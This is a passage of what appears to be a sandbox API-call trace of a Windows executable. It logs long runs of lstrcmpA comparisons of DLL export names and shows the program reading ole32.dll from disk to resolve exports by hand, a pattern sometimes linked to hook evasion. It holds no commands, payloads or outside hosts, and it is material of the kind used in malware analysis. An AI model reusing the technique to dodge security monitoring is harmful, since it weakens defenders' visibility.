(lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0278.486] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0278.486] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0278.486] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0278.486] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0278.486] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0278.486] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0278.486] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0278.486] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0278.486] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0278.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0278.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0278.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0278.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0278.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0278.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0278.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0278.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0278.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0278.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0278.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0278.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0278.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0278.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0278.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0278.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0278.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0278.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0278.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0278.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0278.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0278.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0278.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0278.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0278.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0278.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0278.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0278.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0278.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0278.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0278.488] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0278.488] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0278.488] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0278.488] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0278.488] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0278.488] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0278.488] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0278.488] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0278.488] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0278.488] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0278.488] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0278.488] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0278.488] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0278.488] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0278.488] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0278.489] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0278.489] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0278.489] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0278.489] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0278.489] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0278.489] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0278.489] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0278.489] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0278.489] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0278.489] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0278.489] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0278.489] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0278.489] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0278.490] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0278.490] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0278.490] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0278.490] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0278.490] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0278.490] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0278.490] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0278.490] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0278.490] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0278.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0278.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0278.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0278.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0278.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0278.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0278.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0278.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0278.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0278.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0278.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0278.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0278.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0278.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0278.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0278.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0278.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0278.492] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0278.492] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0278.492] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0278.492] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0278.492] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0278.492] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0278.492] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0278.492] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0278.492] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0278.492] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0278.492] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0278.492] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0278.492] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0278.492] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0278.492] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0278.492] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0278.492] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0278.492] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0278.492] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0278.492] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0278.492] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0278.492] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0278.492] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0278.492] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0278.492] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0278.493] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0278.493] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0278.494] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0278.494] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0278.494] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0278.494] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0278.494] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0278.494] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0278.494] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0278.494] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0278.494] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0278.494] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0278.494] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0278.494] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0278.903] GetProcessHeap () returned 0x540000 [0278.903] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2d42010 | out: hHeap=0x540000) returned 1 [0279.041] GetProcessHeap () returned 0x540000 [0279.041] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x559080 [0279.042] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0279.042] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0279.042] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0279.042] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0279.043] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0279.044] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0279.044] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0279.044] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0279.044] GetProcessHeap () returned 0x540000 [0279.044] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x142d00) returned 0x4101040 [0279.047] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0279.047] ReadFile (in: hFile=0x140, lpBuffer=0x4101040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4101040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0279.245] CloseHandle (hObject=0x140) returned 1 [0279.245] lstrcmpA (lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0279.245] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 1 [0279.245] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0279.245] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0279.246] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0279.247] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0279.247] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0279.247] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0279.247] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 [0279.247] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0279.247] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0279.247] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0279.247] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0279.247] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0279.247] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0279.247] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0279.247] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0279.247] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0279.247] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0279.247] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0279.247] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0279.247] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0279.247] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0279.247] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0279.247] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0279.247] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0279.247] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0279.247] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0279.247] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0279.247] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0279.247] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0279.248] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0279.248] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0279.248] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0279.248] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0279.248] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0279.248] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0279.248] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0279.248] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0279.248] lstrcmpA 